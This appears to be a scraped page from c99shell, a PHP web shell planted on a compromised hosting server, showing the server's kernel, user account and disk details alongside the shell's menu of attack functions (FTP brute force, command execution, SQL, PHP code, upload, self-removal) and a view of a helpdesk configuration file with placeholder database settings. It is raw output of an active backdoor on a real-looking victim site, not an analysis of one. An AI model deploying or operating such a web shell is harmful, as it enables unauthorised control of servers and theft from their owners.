smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/var/softaculous/helpdeskz/   drwxr-xr-x
Free 422.89 GB of 543.66 GB (77.79%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Helpdesk.php (1009 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package EvolutionScript
 * @author: EvolutionScript S.A.C.
 * @Copyright (c) 2010 - 2020, EvolutionScript.com
 * @link http://www.evolutionscript.com
 */

namespace Config;


use 
CodeIgniter\Config\BaseConfig;

class 
Helpdesk extends BaseConfig
{
    
#Database host
    
const DB_HOST '[[softdbhost]]';

    
#Database username
    
const DB_USER '[[softdbuser]]';

    
#Database password
    
const DB_PASSWORD '[[softdbpass]]';

    
#Database name
    
const DB_NAME '[[softdb]]';

    
#Database table prefix
    
const DB_PREFIX '[[dbprefix]]';

    
#Database port, do not change it if you are not sure
    
const DB_PORT 3306;

    
#URL of your helpdesk
    
const SITE_URL '[[softurl]]';

    
#Upload path for images used in HTML editor and logo
    
const UPLOAD_PATH FCPATH.'upload';

    
#Default helpdesk language
    
const DEFAULT_LANG 'en';

    
#URI name to access to staff panel. Ex: staff / then you can access in http://helpdesk.com/staff
    
const STAFF_URI 'staff';
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0041 ]--